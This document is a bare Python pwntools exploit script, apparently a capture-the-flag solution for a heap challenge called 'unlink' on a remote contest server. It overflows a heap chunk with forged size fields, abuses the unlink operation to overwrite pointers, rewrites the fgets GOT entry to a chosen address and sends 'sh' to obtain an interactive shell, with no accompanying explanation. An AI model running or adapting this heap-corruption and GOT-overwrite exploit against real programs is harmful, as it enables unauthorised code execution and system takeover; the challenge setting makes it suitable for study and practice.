from pwn import *
elf = ELF('./unlink')
#r = remote("0",8888)
r = remote("csie.ctf.tw",10153)
raw_input()
r.sendline("add")
r.sendline("0")
r.sendline("168")
r.sendline("AAAAA")
r.sendline("add")
r.sendline("1")
r.sendline("168")
r.sendline("BBBB")
r.sendline("remove")
r.sendline("0")
r.sendline("add")
r.sendline("0")
r.sendline("168")
r.sendline("C"*160+p64(304)+p64(0xb0))#overflow
r.sendline("remove  "+p64(0)+p64(0x402070)+p64(0x402078))
r.sendline("1")
#write cmd pointer address
r.sendline("A"*24+p64(elf.got['fgets']))
r.sendline("sh"+"\x00"*6+p64(0x0000000000400946))
r.interactive()

